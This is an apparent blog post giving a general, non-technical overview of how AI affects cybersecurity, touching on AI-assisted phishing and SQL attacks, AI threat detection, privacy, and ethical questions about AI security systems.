Business Security in the AI Age

MJ

Jul 12, 2024By Mike Jening

The rapid advancement of artificial intelligence is completely changing the field of cybersecurity, and it's happening right now. That's not an exaggeration. This is really happening, and it's challenging us to protect things in new ways. We're going to look at some of the key things that make the AI age different when it comes to security, including what happens when AIs have objectives that may not be aligned with our own and the many doors that we've already left open to AI by using it to build so many of the systems on which we already rely for security.

AI-fueled danger: Cyber crooks employ AI to mount much more skilled attacks. They design AI algorithms to do such things as generate very believable come-ons in phishing emails (a technique already in use), create morphable images that can fool biometric vetting, guess a person’s passwords, conduct automated SQL attacks on web apps, and much more—all at efficiencies that outpace human operators.

The defensive applications of AI have also become indispensable in fighting cyber crime. By detecting and analyzing the unusual patterns that indicate a hack, AI can help us respond much faster than we could with human resources alone. Indeed, we'll probably never be able to respond effectively to the number and speed of the breaches without the assistance of AI.

Concerns about privacy are rising in the AI era. Why? AI systems often require data and lots of it. So would AI be safer if it worked on a government server? That's what a joint report published last week by Stanford University's Center for Internet and Society warned against. And could an AI system be used to take reams of observation from human viewers and, based on them, identify you by your gait, the pattern of your heartbeats, or the rhythms of your typing on a keyboard? Stanford says yes.

The ever-widening scope for artificial intelligence keeps throwing up a host of ethical questions which require immediate attention. Ensuring the rightness or wrongness of decisions an AI-powered security system makes, for instance, is an area where much debate is happening and will continue to happen. There is a genuine concern as to how to make these systems more explainable and accountable. After all, the systems being developed today are likely to be very powerful indeed. So much so that they could probably make decisions of the kind for which we really do look to a human being--decisions over life and death situations, for example.

The artificial intelligence as the human factor: as the extent of AI's appearance in security programs has grown, so has the appearance of AI in the discussion of what it means to be a human. Even seemingly simple security "bots" that rove through networks, looking for signs of suspicious activity, have something approaching consciousness: they consider what constitutes a threat, just as a security analyst would, and they're becoming more adept at doing so all the time. Yet they lack something that neuroscientists clearly identify as a distinctive human attribute: moral judgment.

As we move through this uncharted territory, it is becoming apparent that AI will dominate the battle of the cyber realm. That means that both offensive and defensive moves will be made by AI. People and organizations must be aware and base their strategies on this artificial world; otherwise, we will not be able to keep up—much less thrive—in an era where AI is king.